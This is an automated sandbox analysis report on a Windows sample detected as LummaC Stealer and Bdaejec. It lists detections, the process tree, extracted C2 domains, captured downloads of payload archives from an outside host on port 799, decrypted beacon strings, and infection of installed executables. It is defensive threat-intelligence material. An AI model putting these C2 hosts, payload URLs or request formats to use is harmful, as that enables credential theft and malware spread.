Edit tour

Windows Analysis Report
Lisect_AVT_24003_G1A_70.exe

Overview

General Information

Sample name:	Lisect_AVT_24003_G1A_70.exe
Analysis ID:	1481154
MD5:	641443f984c1754a4d606b248b334577
SHA1:	b618cd68aeb6ac78600f312c70ee484d6931559c
SHA256:	def706463545d7e16aa4a10449854f28bd979780cd227affd5c0c2ad52ae8026
Tags:	exe
Infos:

Detection

LummaC, Bdaejec, LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Bdaejec

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Hides threads from debuggers

Infects executable files (exe, dll, sys, html)

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has a writeable .text section

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Sample file is different than original file name gathered from version info

Sigma detected: Use Short Name Path in Command Line

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

System is w10x64

Lisect_AVT_24003_G1A_70.exe (PID: 7464 cmdline: "C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe" MD5: 641443F984C1754A4D606B248B334577)

oHOvZLBf.exe (PID: 7520 cmdline: C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)

WerFault.exe (PID: 7836 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7520 -s 1528 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["strainriskpropos.stor", "telephoneverdictyow.site", "punchtelephoneverdi.stor", "smallrabbitcrossing.site", "smallrabbitcrossing.site", "snuggleapplicationswo.fun", "theoryapparatusjuko.fun", "healthproline.pro", "strainriskpropos.stor", "telephoneverdictyow.site", "punchtelephoneverdi.stor", "smallrabbitcrossing.site", "smallrabbitcrossing.site", "snuggleapplicationswo.fun", "theoryapparatusjuko.fun", "healthproline.pro"], "Build id": "kPnM2L--LogsDillerCloud"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: oHOvZLBf.exe PID: 7520	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe, ParentCommandLine: "C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe", ParentImage: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe, ParentProcessId: 7464, ParentProcessName: Lisect_AVT_24003_G1A_70.exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe, ProcessId: 7520, ProcessName: oHOvZLBf.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (snuggleapplicationswo .fun) - Source IP: 192.168.2.7 - Destination IP: 1.1.1.1

Timestamp:	2024-07-25T04:58:43.778567+0200
SID:	2050856
Source Port:	63883
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (theoryapparatusjuko .fun) - Source IP: 192.168.2.7 - Destination IP: 1.1.1.1

Timestamp:	2024-07-25T04:58:43.766900+0200
SID:	2050858
Source Port:	59294
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 52.165.165.26 - Destination IP: 192.168.2.7

Timestamp:	2024-07-25T04:58:57.433919+0200
SID:	2022930
Source Port:	443
Destination Port:	49708
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup - Source IP: 192.168.2.7 - Destination IP: 1.1.1.1

Timestamp:	2024-07-25T04:58:39.801665+0200
SID:	2838522
Source Port:	54401
Destination Port:	53
Protocol:	UDP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (strainriskpropos .store) - Source IP: 192.168.2.7 - Destination IP: 1.1.1.1

Timestamp:	2024-07-25T04:58:43.832441+0200
SID:	2050857
Source Port:	50584
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.7 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T04:58:44.570213+0200
SID:	2807908
Source Port:	49700
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 52.165.165.26 - Destination IP: 192.168.2.7

Timestamp:	2024-07-25T04:59:36.509557+0200
SID:	2022930
Source Port:	443
Destination Port:	62958
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (healthproline .pro) - Source IP: 192.168.2.7 - Destination IP: 1.1.1.1

Timestamp:	2024-07-25T04:58:43.634105+0200
SID:	2050898
Source Port:	63317
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (punchtelephoneverdi .store) - Source IP: 192.168.2.7 - Destination IP: 1.1.1.1

Timestamp:	2024-07-25T04:58:43.800724+0200
SID:	2050860
Source Port:	64456
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ET JA3 Hash - Possible Malware - Fake Firefox Font Update - Source IP: 192.168.2.7 - Destination IP: 20.42.65.92

Timestamp:	2024-07-25T04:59:03.851303+0200
SID:	2028371
Source Port:	62955
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.7 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T04:58:47.684516+0200
SID:	2807908
Source Port:	49701
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.7 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T04:58:40.340897+0200
SID:	2807908
Source Port:	49699
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (smallrabbitcrossing .site) - Source IP: 192.168.2.7 - Destination IP: 1.1.1.1

Timestamp:	2024-07-25T04:58:43.789767+0200
SID:	2050861
Source Port:	61257
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (telephoneverdictyow .site) - Source IP: 192.168.2.7 - Destination IP: 1.1.1.1

Timestamp:	2024-07-25T04:58:43.811138+0200
SID:	2050859
Source Port:	57262
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Lisect_AVT_24003_G1A_70.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ddos.dnsnb8.net:799/cj//k3.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar	URL Reputation: Label: malware
Source: https://snuggleapplicationswo.fun/y	Avira URL Cloud: Label: malware
Source: healthproline.pro	Avira URL Cloud: Label: malware
Source: https://strainriskpropos.store/api	Avira URL Cloud: Label: malware
Source: https://telephoneverdictyow.site/	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar	URL Reputation: Label: malware
Source: telephoneverdictyow.site	Avira URL Cloud: Label: malware
Source: https://strainriskpropos.store:443/api7	Avira URL Cloud: Label: malware
Source: https://strainriskpropos.store/apii9	Avira URL Cloud: Label: malware
Source: https://telephoneverdictyow.site/7	Avira URL Cloud: Label: malware
Source: https://telephoneverdictyow.site/8	Avira URL Cloud: Label: malware
Source: https://theoryapparatusjuko.fun/	Avira URL Cloud: Label: malware
Source: smallrabbitcrossing.site	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarTq	Avira URL Cloud: Label: malware
Source: https://theoryapparatusjuko.fun/api	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarO	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarDC:	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarl	Avira URL Cloud: Label: malware
Source: https://punchtelephoneverdi.store/	Avira URL Cloud: Label: malware
Source: https://strainriskpropos.store/	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.raroC:	Avira URL Cloud: Label: malware
Source: https://strainriskpropos.store/apiG	Avira URL Cloud: Label: malware
Source: theoryapparatusjuko.fun	Avira URL Cloud: Label: malware
Source: https://smallrabbitcrossing.site/	Avira URL Cloud: Label: malware
Source: snuggleapplicationswo.fun	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rar4	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarc	Avira URL Cloud: Label: phishing
Source: https://smallrabbitcrossing.site/M	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files\7-Zip\Uninstall.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Jadtre.B

Found malware configuration

Source: Lisect_AVT_24003_G1A_70.exe.7464.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["strainriskpropos.stor", "telephoneverdictyow.site", "punchtelephoneverdi.stor", "smallrabbitcrossing.site", "smallrabbitcrossing.site", "snuggleapplicationswo.fun", "theoryapparatusjuko.fun", "healthproline.pro", "strainriskpropos.stor", "telephoneverdictyow.site", "punchtelephoneverdi.stor", "smallrabbitcrossing.site", "smallrabbitcrossing.site", "snuggleapplicationswo.fun", "theoryapparatusjuko.fun", "healthproline.pro"], "Build id": "kPnM2L--LogsDillerCloud"}

Multi AV Scanner detection for domain / URL

Source: ddos.dnsnb8.net	Virustotal: Detection: 12%	Perma Link
Source: strainriskpropos.store	Virustotal: Detection: 21%	Perma Link
Source: snuggleapplicationswo.fun	Virustotal: Detection: 21%	Perma Link
Source: telephoneverdictyow.site	Virustotal: Detection: 21%	Perma Link
Source: punchtelephoneverdi.store	Virustotal: Detection: 20%	Perma Link
Source: smallrabbitcrossing.site	Virustotal: Detection: 21%	Perma Link
Source: healthproline.pro	Virustotal: Detection: 10%	Perma Link
Source: theoryapparatusjuko.fun	Virustotal: Detection: 20%	Perma Link
Source: healthproline.pro	Virustotal: Detection: 10%	Perma Link
Source: https://strainriskpropos.store/api	Virustotal: Detection: 18%	Perma Link
Source: https://strainriskpropos.store:443/api7	Virustotal: Detection: 7%	Perma Link
Source: https://telephoneverdictyow.site/	Virustotal: Detection: 19%	Perma Link
Source: smallrabbitcrossing.site	Virustotal: Detection: 21%	Perma Link
Source: telephoneverdictyow.site	Virustotal: Detection: 21%	Perma Link
Source: https://theoryapparatusjuko.fun/	Virustotal: Detection: 20%	Perma Link
Source: https://theoryapparatusjuko.fun/api	Virustotal: Detection: 18%	Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k1.rarDC:	Virustotal: Detection: 9%	Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k2.rarl	Virustotal: Detection: 10%	Perma Link
Source: https://strainriskpropos.store/apiG	Virustotal: Detection: 17%	Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k1.rarO	Virustotal: Detection: 12%	Perma Link
Source: theoryapparatusjuko.fun	Virustotal: Detection: 20%	Perma Link
Source: https://smallrabbitcrossing.site/	Virustotal: Detection: 22%	Perma Link
Source: https://strainriskpropos.store/	Virustotal: Detection: 21%	Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k3.raroC:	Virustotal: Detection: 14%	Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k3.rar4	Virustotal: Detection: 14%	Perma Link
Source: https://punchtelephoneverdi.store/	Virustotal: Detection: 20%	Perma Link
Source: snuggleapplicationswo.fun	Virustotal: Detection: 21%	Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k1.rarc	Virustotal: Detection: 11%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe

ReversingLabs: Detection: 92%

Multi AV Scanner detection for submitted file

Source: Lisect_AVT_24003_G1A_70.exe

Virustotal: Detection: 86%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files\7-Zip\Uninstall.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Lisect_AVT_24003_G1A_70.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: strainriskpropos.stor
Source: 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: telephoneverdictyow.site
Source: 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: punchtelephoneverdi.stor
Source: 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: smallrabbitcrossing.site
Source: 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: snuggleapplicationswo.fun
Source: 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: theoryapparatusjuko.fun
Source: 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: healthproline.pro
Source: 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000003.1326537394.00000000009F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: kPnM2L--LogsDillerCloud

Source: Lisect_AVT_24003_G1A_70.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Lisect_AVT_24003_G1A_70.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe

Code function: 2_2_00DF29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

2_2_00DF29E2

Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe

Code function: 2_2_00DF2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

2_2_00DF2B8C

Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: strainriskpropos.stor
Source: Malware configuration extractor	URLs: telephoneverdictyow.site
Source: Malware configuration extractor	URLs: punchtelephoneverdi.stor
Source: Malware configuration extractor	URLs: smallrabbitcrossing.site
Source: Malware configuration extractor	URLs: smallrabbitcrossing.site
Source: Malware configuration extractor	URLs: snuggleapplicationswo.fun
Source: Malware configuration extractor	URLs: theoryapparatusjuko.fun
Source: Malware configuration extractor	URLs: healthproline.pro
Source: Malware configuration extractor	URLs: strainriskpropos.stor
Source: Malware configuration extractor	URLs: telephoneverdictyow.site
Source: Malware configuration extractor	URLs: punchtelephoneverdi.stor
Source: Malware configuration extractor	URLs: smallrabbitcrossing.site
Source: Malware configuration extractor	URLs: smallrabbitcrossing.site
Source: Malware configuration extractor	URLs: snuggleapplicationswo.fun
Source: Malware configuration extractor	URLs: theoryapparatusjuko.fun
Source: Malware configuration extractor	URLs: healthproline.pro

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 799

Source: global traffic

TCP traffic: 192.168.2.7:49699 -> 44.221.84.105:799

Source: Joe Sandbox View

IP Address: 44.221.84.105 44.221.84.105

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe

Code function: 2_2_00DF1099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,

2_2_00DF1099

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: ddos.dnsnb8.net
Source: global traffic	DNS traffic detected: DNS query: healthproline.pro
Source: global traffic	DNS traffic detected: DNS query: theoryapparatusjuko.fun
Source: global traffic	DNS traffic detected: DNS query: snuggleapplicationswo.fun
Source: global traffic	DNS traffic detected: DNS query: smallrabbitcrossing.site
Source: global traffic	DNS traffic detected: DNS query: punchtelephoneverdi.store
Source: global traffic	DNS traffic detected: DNS query: telephoneverdictyow.site
Source: global traffic	DNS traffic detected: DNS query: strainriskpropos.store

Source: oHOvZLBf.exe, 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmp, oHOvZLBf.exe, 00000002.00000003.1289900252.00000000007F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C52000.00000004.00000020.00020000.00000000.sdmp, oHOvZLBf.exe, 00000002.00000003.1308206699.0000000000C6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: oHOvZLBf.exe, 00000002.00000003.1308206699.0000000000C6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarDC:
Source: oHOvZLBf.exe, 00000002.00000003.1308206699.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarO
Source: oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarTq
Source: oHOvZLBf.exe, 00000002.00000003.1308206699.0000000000C52000.00000004.00000020.00020000.00000000.sdmp, oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarc
Source: oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000BF6000.00000004.00000020.00020000.00000000.sdmp, oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarl
Source: oHOvZLBf.exe, 00000002.00000002.1539440567.000000000289A000.00000004.00000010.00020000.00000000.sdmp, oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C6C000.00000004.00000020.00020000.00000000.sdmp, oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C52000.00000004.00000020.00020000.00000000.sdmp, oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
Source: oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar4
Source: oHOvZLBf.exe, 00000002.00000002.1538999460.0000000000C6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.raroC:
Source: Amcache.hve.2.dr	String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.develop.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.lua.org
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.spaceblue.comMathias
